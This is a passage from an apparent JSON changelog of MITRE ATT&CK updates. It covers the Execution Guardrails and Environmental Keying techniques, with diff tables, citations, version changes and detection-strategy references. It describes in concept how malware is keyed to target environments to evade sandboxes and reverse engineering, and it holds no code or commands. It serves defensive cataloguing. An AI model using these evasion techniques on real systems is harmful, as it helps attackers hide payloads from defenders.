nowrap=\"nowrap\">on&nbsp;member&nbsp;accounts&nbsp;without&nbsp;creating&nbsp;identities&nbsp;for&nbsp;each&nbsp;of&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;member&nbsp;accounts&nbsp;without&nbsp;creating&nbsp;identities&nbsp;for&nbsp;each&nbsp;of&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;member&nbsp;accounts.(Citation:&nbsp;AWS&nbsp;<span class=\"diff_chg\">RE:</span>Inforce&nbsp;T<span class=\"diff_chg\">hreat&nbsp;Detectio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;member&nbsp;accounts.(Citation:&nbsp;AWS&nbsp;<span class=\"diff_chg\">re&nbsp;</span>Inforce&nbsp;T<span class=\"diff_chg\">rust&nbsp;Mod</span>)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">n&nbsp;2024</span>)</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0458: Detection of Trust Relationship Modifications in Domain or Tenant Policies"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-01-31 02:10:08.261000+00:00",
                    "modified": "2026-04-15 20:03:40.312000+00:00",
                    "name": "Execution Guardrails",
                    "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.\n\nAdversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1480",
                            "external_id": "T1480"
                        },
                        {
                            "source_name": "FireEye Outlook Dec 2019",
                            "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html"
                        },
                        {
                            "source_name": "Trellix-Qakbot",
                            "description": "Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware Distribution. Retrieved June 7, 2024.",
                            "url": "https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/"
                        },
                        {
                            "source_name": "FireEye Kevin Mandia Guardrails",
                            "description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.",
                            "url": "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Nick Carr, Mandiant"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:03:40.312000+00:00\", \"old_value\": \"2025-10-24 17:49:03.764000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1055: Do Not Mitigate"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0562: Multi-Platform Execution Guardrails Environmental Validation Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-23 22:28:28.041000+00:00",
                    "modified": "2026-04-15 20:07:10.470000+00:00",
                    "name": "Environmental Keying",
                    "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1480/001",
                            "external_id": "T1480.001"
                        },
                        {
                            "source_name": "Proofpoint Router Malvertising",
                            "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.",
                            "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices"
                        },
                        {
                            "source_name": "Kaspersky Gauss Whitepaper",
                            "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.",
                            "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf"
                        },
                        {
                            "source_name": "EK Clueless Agents",
                            "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.",
                            "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf"
                        },
                        {
                            "source_name": "EK Impeding Malware Analysis",
                            "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.",
                            "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf"
                        },
                        {
                            "source_name": "Demiguise Guardrail Router Logo",
                            "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.",
                            "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js"
                        },
                        {
                            "source_name": "Environmental Keyed HTA",
                            "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved November 17, 2024.",
                            "url": "http://web.archive.org/web/20200608093807/https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Nick Carr, Mandiant"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:07:10.470000+00:00\", \"old_value\": \"2025-10-24 17:49:35.768000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\\n\\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\\n\\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\\n\\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.\", \"old_value\": \"Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\\n\\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\\n\\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\\n\\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.\", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1,7 @@\\n Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\\n \\n-Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\\n+Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\\n \\n-Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\\n+Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\\n \\n Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][3]\": {\"source_name\": \"Ebowla: Genetic Malware\", \"description\": \"Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.\", \"url\": \"https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to30__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to30__0\"><a href=\"#difflib_chg_to30__top\">t</a></td><td class=\"diff_header\" id=\"from30_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;environmentally&nbsp;key&nbsp;payloads&nbsp;or&nbsp;other&nbsp;featur</td><td class=\"diff_next\"><a href=\"#difflib_chg_to30__top\">t</a></td><td class=\"diff_header\" id=\"to30_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;environmentally&nbsp;key&nbsp;payloads&nbsp;or&nbsp;other&nbsp;featur</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;of&nbsp;malware&nbsp;to&nbsp;evade&nbsp;defenses&nbsp;and&nbsp;constraint&nbsp;execution&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;of&nbsp;malware&nbsp;to&nbsp;evade&nbsp;defenses&nbsp;and&nbsp;constraint&nbsp;execution&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;specific&nbsp;target&nbsp;environment.&nbsp;Environmental&nbsp;keying&nbsp;uses&nbsp;cry</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;specific&nbsp;target&nbsp;environment.&nbsp;Environmental&nbsp;keying&nbsp;uses&nbsp;cry</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ptography&nbsp;to&nbsp;constrain&nbsp;execution&nbsp;or&nbsp;actions&nbsp;based&nbsp;on&nbsp;adversa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ptography&nbsp;to&nbsp;constrain&nbsp;execution&nbsp;or&nbsp;actions&nbsp;based&nbsp;on&nbsp;adversa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry&nbsp;supplied&nbsp;environment&nbsp;specific&nbsp;conditions&nbsp;that&nbsp;are&nbsp;expecte</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry&nbsp;supplied&nbsp;environment&nbsp;specific&nbsp;conditions&nbsp;that&nbsp;are&nbsp;expecte</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;to&nbsp;be&nbsp;present&nbsp;on&nbsp;the&nbsp;target.&nbsp;Environmental&nbsp;keying&nbsp;is&nbsp;an&nbsp;im</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;to&nbsp;be&nbsp;present&nbsp;on&nbsp;the&nbsp;target.&nbsp;Environmental&nbsp;keying&nbsp;is&nbsp;an&nbsp;im</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plementation&nbsp;of&nbsp;[Execution&nbsp;Guardrails](https://attack.mitre.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plementation&nbsp;of&nbsp;[Execution&nbsp;Guardrails](https://attack.mitre.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">org/techniques/T1480)&nbsp;that&nbsp;utilizes&nbsp;cryptographic&nbsp;techniques</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">org/techniques/T1480)&nbsp;that&nbsp;utilizes&nbsp;cryptographic&nbsp;techniques</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;deriving&nbsp;encryption/decryption&nbsp;keys&nbsp;from&nbsp;specific&nbsp;types</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;for&nbsp;deriving&nbsp;encryption/decryption&nbsp;keys&nbsp;from&nbsp;specific&nbsp;types</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;values&nbsp;in&nbsp;a&nbsp;given&nbsp;computing&nbsp;environment.(Citation:&nbsp;EK&nbsp;Cl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;values&nbsp;in&nbsp;a&nbsp;given&nbsp;computing&nbsp;environment.(Citation:&nbsp;EK&nbsp;Cl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ueless&nbsp;Agents)&nbsp;&nbsp;Values&nbsp;can&nbsp;be&nbsp;derived&nbsp;from&nbsp;target-specific&nbsp;e</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ueless&nbsp;Agents)&nbsp;&nbsp;Values&nbsp;can&nbsp;be&nbsp;derived&nbsp;from&nbsp;target-specific&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lements&nbsp;and&nbsp;used&nbsp;to&nbsp;generate&nbsp;a&nbsp;decryption&nbsp;key&nbsp;for&nbsp;an&nbsp;encrypt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lements&nbsp;and&nbsp;used&nbsp;to&nbsp;generate&nbsp;a&nbsp;decryption&nbsp;key&nbsp;for&nbsp;an&nbsp;encrypt</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;payload.&nbsp;Target-specific&nbsp;values&nbsp;can&nbsp;be&nbsp;derived&nbsp;from&nbsp;speci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;payload.&nbsp;Target-specific&nbsp;values&nbsp;can&nbsp;be&nbsp;derived&nbsp;from&nbsp;speci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fic&nbsp;network&nbsp;shares,&nbsp;physical&nbsp;devices,&nbsp;software/software&nbsp;vers</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fic&nbsp;network&nbsp;shares,&nbsp;physical&nbsp;devices,&nbsp;software/software&nbsp;vers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ions,&nbsp;files,&nbsp;joined&nbsp;AD&nbsp;domains,&nbsp;system&nbsp;time,&nbsp;and&nbsp;local/exter</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ions,&nbsp;files,&nbsp;joined&nbsp;AD&nbsp;domains,&nbsp;system&nbsp;time,&nbsp;and&nbsp;local/exter</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nal&nbsp;IP&nbsp;addresses.(Citation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)(Cita</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nal&nbsp;IP&nbsp;addresses.(Citation:&nbsp;Kaspersky&nbsp;Gauss&nbsp;Whitepaper)(Cita</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;Proofpoint&nbsp;Router&nbsp;Malvertising)(Citation:&nbsp;EK&nbsp;Impeding&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;Proofpoint&nbsp;Router&nbsp;Malvertising)(Citation:&nbsp;EK&nbsp;Impeding&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Malware&nbsp;Analysis)(Citation:&nbsp;Environmental&nbsp;Keyed&nbsp;HTA)<span class=\"diff_chg\">(Citatio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Malware&nbsp;Analysis)(Citation:&nbsp;Environmental&nbsp;Keyed&nbsp;HTA)<span class=\"diff_chg\">&nbsp;By&nbsp;gene</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">n:&nbsp;E</span>bow<span class=\"diff_chg\">la:&nbsp;Genetic&nbsp;Malware)&nbsp;By&nbsp;generating&nbsp;the&nbsp;decryption&nbsp;key</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">rating&nbsp;the&nbsp;decryption&nbsp;keys&nbsp;from&nbsp;target-specific&nbsp;environmenta</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">s&nbsp;from&nbsp;target-specific&nbsp;environmental&nbsp;values</span>,&nbsp;<span class=\"diff_chg\">environmental&nbsp;k</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 